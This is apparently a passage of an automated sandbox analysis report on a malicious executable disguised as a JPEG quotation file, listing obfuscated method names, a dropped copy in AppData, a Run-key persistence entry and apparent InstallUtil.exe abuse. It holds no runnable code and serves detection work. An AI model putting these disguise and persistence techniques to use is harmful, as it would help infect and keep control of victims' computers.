                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_064F3BC2 pushad ; ret 0_2_064F3BC9
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_065076E0 pushfd ; iretd 0_2_065076ED
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06502291 push es; ret 0_2_065022A0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06500006 push es; iretd 0_2_0650001C
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06545E79 push es; ret 0_2_06545EAC
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06545E79 push es; iretd 0_2_06545EE4
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0654EED8 pushfd ; retf 0_2_0654EED9
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0654EE88 push esp; retf 0_2_0654EE89
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06545EAD push es; iretd 0_2_06545EE4
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06547746 push es; retf 0_2_06547748
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06545F9D push es; ret 0_2_06545FC8
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_06543221 push ss; iretd 0_2_06543224
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0654B870 push es; ret 0_2_0654B920
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0654714C push cs; ret 0_2_0654714F
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0654610E push es; retf 0_2_06546118
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_0654E1FD push ecx; iretd 0_2_0654E21C
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_065B12CA push B006593Fh; iretd 0_2_065B1325
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_065C3E89 push esi; ret 0_2_065C3E8F
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeCode function: 0_2_065C3287 push ecx; iretd 0_2_065C3288
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_014D9720 push esp; ret 2_2_014D9721
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06853181 push ebx; retf 2_2_06853182
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05902EA7 push esp; retf 3_2_05902EA8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A9FD99 push B005B334h; iretd 3_2_05A9FDB5
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05A93BC3 pushad ; ret 3_2_05A93BC9
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AEEE88 push esp; retf 3_2_05AEEE89
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AEEED8 pushfd ; retf 3_2_05AEEED9
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AEE1FD push ecx; iretd 3_2_05AEE21C
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE714C push cs; ret 3_2_05AE714F
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE3221 push ss; iretd 3_2_05AE3224
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.6280000.10.raw.unpack, wtV2nOsa2CmueAALmHi.csHigh entropy of concatenated method names: 'PFbsEwe8Je', 'U8A85IunLbckruXOhDR', 'OXjBLtu8xSCXlJah1KF', 'sn7C6IuGdhT3sheVtS2', 'P9RXemubvLWXbI1nupb', 'Dj7tppuu2qYweNJ4vxS', 'QBv2E9uOMLSi0Vf4Ble'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.6280000.10.raw.unpack, AjBCn8seDa4miASEKPT.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'GQls38iTt8', 'NtProtectVirtualMemory', 'w0seO0u9fbRFVTcnXsD', 'c9XCmcuIYPjMvXYXVn5', 'eWcexQu3KDyCJbDflMR', 'fgPXOhutfph5jtCyIwD'
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeFile created: C:\Users\user\AppData\Roaming\Gydvapkca.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GydvapkcaJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GydvapkcaJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
